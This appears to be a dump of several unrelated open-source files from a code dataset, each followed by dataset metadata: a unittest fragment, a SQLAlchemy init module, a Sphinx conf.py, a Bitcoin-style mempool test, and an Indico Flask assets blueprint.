"""Tests that the setting to close an expired connection in a client propagates to the connection
for a pooled connection
"""
pooled_mock = MagicMock(spec=PooledConnection(), autospec=True)
function_mock = Mock(name="close_expired_connections_mock")
pooled_mock.attach_mock(function_mock, "close_expired_connections")
session = Factory.create_session_from_file(
configuration_file_name=PROPERTIES_URI, connection=pooled_mock,
api_key_id=API_KEY_ID, secret_api_key=SECRET_API_KEY)
client = Factory.create_client_from_session(session)
client.close_expired_connections()
function_mock.assert_called_once_with()
if __name__ == '__main__':
unittest.main()
| mit | 4,281,008,586,416,672,000 | 45.871795 | 120 | 0.695478 | false |
mark-burnett/code-scientist | code_scientist/database/__init__.py | 1 | 1655 | # Copyright (C) 2012 Mark Burnett, David Morton
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlalchemy as _sa
import sqlalchemy.orm as _orm
import logging as _logging
import base as _base
import tables as _tables
from function import Function
from file import File
from file_set import FileSet
from snapshot import Snapshot
from repository import Repository
from tag import Tag
from metric import Metric
from metric_value import FunctionMetricValue, FileMetricValue
from metric_value import FileSetMetricValue, SnapshotMetricValue
def initialize(engine_string='sqlite://'):
_logging.debug('Creating SQLAlchemy engine for string: %s', engine_string)
engine = _sa.create_engine(engine_string)
_logging.debug('Creating tables.')
_base.Base.metadata.create_all(engine)
_base.Base.metadata.bind = engine
_logging.debug('Creating Session class.')
global Session
global UnscopedSession
UnscopedSession = _orm.sessionmaker(bind=engine)
Session = _orm.scoped_session(UnscopedSession)
| gpl-3.0 | -3,192,524,026,105,203,000 | 34.212766 | 78 | 0.753474 | false |
pombredanne/DjangoRestMultipleModels | docs/conf.py | 1 | 9780 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# DjangoRestMultipleModels documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 9 15:00:02 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'DjangoRestMultipleModels'
copyright = '2016, Matt Nishi-Broach'
author = 'Matt Nishi-Broach'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.7'
# The full version, including alpha/beta/rc tags.
release = '1.7'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = 'DjangoRestMultipleModels v1.7'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoRestMultipleModelsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'DjangoRestMultipleModels.tex', 'DjangoRestMultipleModels Documentation',
'Matt Nishi-Broach', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'djangorestmultiplemodels', 'DjangoRestMultipleModels Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DjangoRestMultipleModels', 'DjangoRestMultipleModels Documentation',
author, 'DjangoRestMultipleModels', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
| mit | -2,820,792,643,670,447,600 | 28.281437 | 90 | 0.697342 | false |
LIMXTEC/BitCore | test/functional/mempool_limit.py | 1 | 2019 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test mempool limiting together/eviction with the wallet."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class MempoolLimitTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [["-maxmempool=5", "-mintxfee=0.00001", "-spendzeroconfchange=0"]]
def run_test(self):
txouts = gen_return_txouts()
relayfee = self.nodes[0].getnetworkinfo()['relayfee']
txids = []
utxos = create_confirmed_utxos(relayfee, self.nodes[0], 91)
#create a mempool tx that will be evicted
us0 = utxos.pop()
inputs = [{ "txid" : us0["txid"], "vout" : us0["vout"]}]
outputs = {self.nodes[0].getnewaddress() : 0.01}
tx = self.nodes[0].createrawtransaction(inputs, outputs)
self.nodes[0].settxfee(relayfee) # specifically fund this tx with low fee
txF = self.nodes[0].fundrawtransaction(tx)
self.nodes[0].settxfee(0) # return to automatic fee selection
txFS = self.nodes[0].signrawtransaction(txF['hex'])
txid = self.nodes[0].sendrawtransaction(txFS['hex'])
relayfee = self.nodes[0].getnetworkinfo()['relayfee']
base_fee = relayfee*100
for i in range (3):
txids.append([])
txids[i] = create_lots_of_big_transactions(self.nodes[0], txouts, utxos[30*i:30*i+30], 30, (i+1)*base_fee)
# by now, the tx should be evicted, check confirmation state
assert(txid not in self.nodes[0].getrawmempool())
txdata = self.nodes[0].gettransaction(txid)
assert(txdata['confirmations'] == 0) #confirmation should still be 0
if __name__ == '__main__':
MempoolLimitTest().main()
| mit | -141,675,626,849,960,670 | 41.0625 | 118 | 0.643388 | false |
indico/indico | indico/web/assets/blueprint.py | 1 | 5371 | # This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
import os
from flask import Response, current_app, redirect, request, send_from_directory
from werkzeug.exceptions import NotFound
import indico
from indico.core.config import config
from indico.core.plugins import plugin_engine
from indico.util.i18n import get_all_locales
from indico.web.assets.vars_js import generate_global_file, generate_i18n_file, generate_user_file
from indico.web.flask.util import send_file, url_for
from indico.web.flask.wrappers import IndicoBlueprint
assets_blueprint = IndicoBlueprint('assets', __name__, url_prefix='/assets')
assets_blueprint.add_url_rule('!/css/<path:filename>', 'css', build_only=True)
assets_blueprint.add_url_rule('!/images/<path:filename>', 'image', build_only=True)
assets_blueprint.add_url_rule('!/fonts/<path:filename>', 'fonts', build_only=True)
assets_blueprint.add_url_rule('!/dist/<path:filename>', 'dist', build_only=True)
@assets_blueprint.route('!/<any(images,fonts):folder>/<path:filename>__v<version>.<fileext>')
@assets_blueprint.route('!/<any(css,dist,images,fonts):folder>/<path:filename>.<fileext>')
def folder_file(folder, filename, fileext, version=None):
assets_dir = os.path.join(current_app.root_path, 'web', 'static')
return send_from_directory(assets_dir, os.path.join(folder, filename + '.' + fileext))
@assets_blueprint.route('!/static/plugins/<plugin>/<path:filename>__v<version>.<fileext>')
@assets_blueprint.route('!/static/plugins/<plugin>/<path:filename>.<fileext>')
def plugin_file(plugin, filename, fileext, version=None):
plugin = plugin_engine.get_plugin(plugin)
if not plugin:
raise NotFound
assets_dir = os.path.join(plugin.root_path, 'static')
return send_from_directory(assets_dir, filename + '.' + fileext)
@assets_blueprint.route('!/<filename>')
def root(filename):
assets_dir = os.path.join(current_app.root_path, 'web', 'static')
return send_from_directory(assets_dir, filename)
@assets_blueprint.route('/js-vars/global.js')
def js_vars_global():
"""Provide a JS file with global definitions (all users).
Useful for server-wide config options, URLs, etc...
"""
cache_file = os.path.join(config.CACHE_DIR, f'assets_global_{indico.__version__}_{config.hash}.js')
if config.DEBUG or not os.path.exists(cache_file):
data = generate_global_file()
with open(cache_file, 'w') as f:
f.write(data)
return send_file('global.js', cache_file, mimetype='application/javascript', conditional=True)
@assets_blueprint.route('/js-vars/user.js')
def js_vars_user():
"""Provide a JS file with user-specific definitions.
Useful for favorites, settings etc.
"""
return Response(generate_user_file(), mimetype='application/javascript')
@assets_blueprint.route('/i18n/<locale_name>.js')
def i18n_locale(locale_name):
return _get_i18n_locale(locale_name)
@assets_blueprint.route('/i18n/<locale_name>-react.js')
def i18n_locale_react(locale_name):
return _get_i18n_locale(locale_name, react=True)
def _get_i18n_locale(locale_name, react=False):
"""Retrieve a locale in a Jed-compatible format."""
# Ensure we have a valid locale. en_GB is our source locale and thus always considered
# valid, even if it doesn't exist (dev setup where the user did not compile any locales)
# since otherwise we'd have no valid locales at all and get a redirect loop
all_locales = get_all_locales()
if locale_name not in all_locales and locale_name != 'en_GB':
fallback = config.DEFAULT_LOCALE if config.DEFAULT_LOCALE in all_locales else 'en_GB'
return redirect(url_for(request.endpoint, locale_name=fallback))
react_suffix = '-react' if react else ''
try:
cache_file = os.path.join(config.CACHE_DIR, 'assets_i18n_{}{}_{}_{}.js'.format(
locale_name, react_suffix, indico.__version__, config.hash))
except UnicodeEncodeError:
raise NotFound
if config.DEBUG or not os.path.exists(cache_file):
i18n_data = generate_i18n_file(locale_name, react=react)
if i18n_data is None:
raise NotFound
with open(cache_file, 'w') as f:
f.write('window.{} = {};'.format('REACT_TRANSLATIONS' if react else 'TRANSLATIONS', i18n_data))
return send_file(f'{locale_name}{react_suffix}.js', cache_file, mimetype='application/javascript',
conditional=True)
@assets_blueprint.route('!/static/custom/<any(css,js):folder>/<path:filename>', endpoint='custom')
@assets_blueprint.route('!/static/custom/files/<path:filename>', endpoint='custom', defaults={'folder': 'files'})
def static_custom(folder, filename):
customization_dir = config.CUSTOMIZATION_DIR
if not customization_dir:
raise NotFound
return send_from_directory(os.path.join(customization_dir, folder), filename)
@assets_blueprint.route('!/favicon.ico')
def favicon():
return redirect(url_for('.image', filename='indico.ico'))
@assets_blueprint.route('/avatar/<name>.svg')
@assets_blueprint.route('/avatar/blank.svg')
def avatar(name=None):
from indico.modules.users.util import send_default_avatar
return send_default_avatar(name)
| mit | 1,629,286,778,587,345,700 | 38.785185 | 113 | 0.703407 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.